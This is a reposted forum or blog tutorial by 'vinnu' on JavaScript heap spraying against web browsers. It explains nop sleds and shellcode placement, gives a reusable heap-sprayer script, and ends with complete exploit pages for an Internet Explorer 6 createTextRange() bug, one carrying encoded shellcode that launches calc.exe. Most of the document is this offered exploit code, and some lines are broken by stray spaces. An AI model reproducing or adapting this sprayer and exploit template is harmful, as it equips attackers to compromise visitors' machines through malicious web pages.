• Heap Spray --- Slipping CPU to our pocket--by "vinnu"

    Heap Spray --- Slipping CPU to our pocket

    Author : "vinnu"
    Team : "Legion Of Xtremers" (LOXians)
    Greetz : Prashant Uniyal, b0nd, D4rk357, skylined

    Rootkit Information:

    IDE: any text editor
    Language : Javascript
    Targets: Web browsers


    As the name defines itself Heap Spray technique uses the spraying of heap memory
    with injection vector.
    Injection Vector: Nop sled + Shellcode

    This kind of exploitation is useful in use-after-free, double-free or memory corruption
    vulnerabilities. In such attacks the program tries to access an object instance's methods or poroperties in heap
    memory after the instance has been freed, this may lead to the code execution.

    A typical execution flow of a general heap spray exploit is as:


    -------------------------
    Allocate the object
    & properties if necessary
    -------------------------
    |
    |
    |
    _I_
    -------------------------
    Free the object
    -------------------------
    |
    |
    |
    _I_
    ------------------------
    Spray the heap
    ------------------------
    |
    |
    |
    _I_
    -------------------------
    Trigger the vulnerability
    -------------------------



    And in general we can seperate the heap spray exploits in two sections:

    1. Heap Sprayer
    2. Vulnerability Trigger


    1. Heap Sprayer : A heap sprayer sprays the heap with the properly alligned code to be executed
    upon triggering the vulnerability. In heap spray the memory is repeatedly allocated in the heap area
    and then injection vector is placed in it untill whole heap gets filled up.

    The ammount of spray depends upon the available memory for the program and the guessed position of the
    block of memory in which the vulnerable instance of object gets placed in general.

    In order to develop some efficient sprayers, we must know a little about the fundamentals of allocations.

    When an object gets allocated in heap?

    Consider following two allocation:

    var a = "XXXXXXXXXXXXXXXXXXXXXxxxxx"
    var b = new String("YYYYYYYYYYYYYYYY")


    Well variable "a" will be allocated on stack whereas b will be allocated on heap.

    also consider following assignments:


    var c = a + a;
    var d = a.substring(0,a.length-3);


    c and d Will also be allocated in heap area.

    Also take into note that whan a heap allocation occurs, the largest unused block gets deallocated first and then
    the smaller chunk is allocated there. This also gives control of the heap allocations and its alignment to the attacker.

    Now we should know a little about the data placement in heap area.

    Consider a string "AAAA", it will be placed in memory as unicode string in following form:

    00 41 00 41 00 41 00 41 00 00


    This kind of data handling can destroy the shellcode in memory. therefore, shellcode should be placed in memory
    in unicode form occupying 00 bytes also with precious shellcode bytes.

    For examples consider 90 90 90 90 bytes to be placed in memory as nop sled. Then this nop sled can be allocated as:

    var nopsled = unescape("\u9090\u9090");

    Sameway the shellcode can be placed in memory.

    So now we have basic idea of code allocation. Now let us proceed to develop a sprayer:

    The heap spray is done in two stages.

    First a very large instance of injection vector is prepared & allocated on heap area
    and then it is sprayed all over heap to fill up all available memory for heap allocations.


    Note: After a perfect heap spray, no further heap allocations can be done.




    var shellcode = unescape('<place Shellcode here>'); // shellcode is assigned.
    bigblock = unescape("%u0D0D%u0D0D"); // nop sled
    headersize=20;shellcodesize = headersize + shellcode.length; //Proper length of shellcode in memory is calculated.
    while(bigblock.length < shellcodesize) {
    bigblock += bigblock; // The nopsled of a little big size than shellcode size is first prepared.
    }
    heapshell = bigblock.substring(0, shellcodesize); // Nopsled of proper calculated shellcode length on heap is allocated.
    nopsled = bigblock.substring(0, bigblock.length - shellcodesize); // another chunk of nopsled - propershellcode size in memory is allocated on heap
    while(nopsled.length + shellcodesize < 0x40000){ // Filling up 40000 words (word = 2bytes) for modern browsers. Lets name this line as "single chunk".
    nopsled = nopsled + nopsled + heapshell; // A large single chunk at heap is being populated.
    }


    Above code properly adjusts the nop sled 0x0d0d0d0d and shellcode.
    Now this large heap chunk contained in variable "nopsled" needs to be sprayed throughout the
    heap along with shellcode suffixed to it as:


    spray=new Array();var i=0;
    for(i=0;i<1000;i++) {
    spray[i]=nopsled+shellcode; // Nopsled + shellcode being sprayed throughout the heap area.
    }



    Above code will spray 1000 time the heap enough to bring down a 512 MB physical memory windows XP systems in modern
    web browsers IE7 onwards.

    In case of IE6 and below, u may need to adjust the "single chunk" size and spray size accordingly.

    For examples in case of IE 6 single chunk can be made 86000 whereas spray size can be set to 200 or 400 as per vulnerabilities requirements.

    Now we have an efficient heap sprayer:

    <----------------------heap sprayer------------------------>
    var shellcode=unescape('<place Shellcode here>');
    bigblock=unescape("%u0D0D%u0D0D");
    headersize=20;shellcodesize=headersize+shellcode.l ength;
    while(bigblock.length<shellcodesize){bigblock+=big block;}
    heapshell=bigblock.substring(0,shellcodesize);
    nopsled=bigblock.substring(0,bigblock.length-shellcodesize);
    while(nopsled.length+shellcodesize<0x40000){nopsle d=nopsled+nopsled+heapshell}

    spray=new Array();var i=0;
    for(i=0;i<1000;i++){spray[i]=nopsled+shellcode;}
    <--------------------heap sprayer end---------------------->




    Now let us consider few real world vulnerabilities and develop the exploits with above heap sprayer.


    1. IE 6 textranges(): The vulnerability lies in createTextRange() function associated with checkbox objects in html.


    <html>
    <body>
    <input type="checkbox" id='checkid'>
    <script type=text/javascript language=javascript>
    a=document.getElementById('checkid');
    b=a.createTextRange();
    </script>
    </body>
    </html>




    In order to exploit such a vulnerability, we just need to spray the heap right before triggering the vulnerability.
    after hit and trials and adjustments of "single chunk" size and spray size, we got an efficient exploit :


    <!----------------------textranges.htm---------------->
    <html>
    <body>
    <script language=javascript>
    /*----------------------heap sprayer------------------------*/
    var shellcode=unescape('<place Shellcode here>');
    bigblock=unescape("%u0D0D%u0D0D");
    headersize=20;shellcodesize=headersize+shellcode.l ength;
    while(bigblock.length<shellcodesize){bigblock+=big block;}
    heapshell=bigblock.substring(0,shellcodesize);
    nopsled=bigblock.substring(0,bigblock.length-shellcodesize);
    while(nopsled.length+shellcodesize<0x82000){nopsle d=nopsled+nopsled+heapshell}

    spray=new Array();var i=0;
    for(i=0;i<400;i++){spray[i]=nopsled+shellcode;}
    /*--------------------heap sprayer end----------------------*/
    </script>
    <input type="checkbox" id='checkid'>
    <script type=text/javascript language=javascript>
    a=document.getElementById('checkid');
    b=a.createTextRange();
    </script>
    </body>
    </html>
    <!--------------------textranges.htm end-------------->



    with calc.exe execution shellcode


    <!----------------------textranges.htm---------------->
    <html>
    <body>
    <script language=javascript>
    /*----------------------heap sprayer------------------------*/
    var shellcode=unescape('%u9090%u9090%u9090%u9090%uceba %u11fa%u291f%ub1c9%udb33%ud9ce%u2474%u5ef4%u5631%u 030e%u0e56%u0883%uf3fe%u68ea%u7a17%u9014%u1de8%u75 9c%u0fd9%ufefa%u8048%u5288%u6b61%u46dc%u19f2%u69c9 %u94b3%u442f%u1944%u0af0%u3b86%u508c%u9bdb%u9bad%u dd2e%uc1ea%u8fc1%u8ea3%u2070%ud2c7%u4148%u5907%u39 f0%u9d22%uf385%ucd2d%u8f36%uf566%ud73d%u0456%u0b91 %u4faa%uf89e%u4e58%u3176%u61a0%u9eb6%u4e9f%ude3b%u 68d8%u95a4%u8b12%uae59%uf6e0%u3b85%u50f5%u9b4d%u61 dd%u7a82%u6d95%u086f%u71f1%udd6e%u8d89%ue0fb%u045d %uc6bf%u4d79%u661b%u2bdb%u97ca%u933b%u3db3%u3137%u 44a7%u5f1a%uc436%u2620%ud638%u082a%ue751%uc7a1%uf8 26%uac63%u1ac9%ud8a6%u8361%u6123%u34ec%ua59e%ub709 %u552b%ua7ee%u5059%u6faa%u28b1%u05a3%u9fb5%u0fc4%u 7ed6%ud357%ue537%u76df%u4148');
    bigblock=unescape("%u0D0D%u0D0D");
    headersize=20;shellcodesize=headersize+shellcode.l ength;
    while(bigblock.length<shellcodesize){bigblock+=big block;}
    heapshell=bigblock.substring(0,shellcodesize);
    nopsled=bigblock.substring(0,bigblock.length-shellcodesize);
    while(nopsled.length+shellcodesize<0x86000){nopsle d=nopsled+nopsled+heapshell}

    spray=new Array();var i=0;
    for(i=0;i<800;i++){spray[i]=nopsled+shellcode;}
    /*--------------------heap sprayer end----------------------*/
    </script>
    <input type="checkbox" id='checkid'>
    <script type=text/javascript language=javascript>
    a=document.getElementById('checkid');
    b=a.createTextRange();
    </script>
    </body>
    </html>
    <!--------------------textranges.htm end-------------->
    This article was originally published in blog: Heap Spray --- Slipping CPU to our pocket--by "vinnu" started by prashant_uniyal
  • G4H Facebook

  • G4H Twitter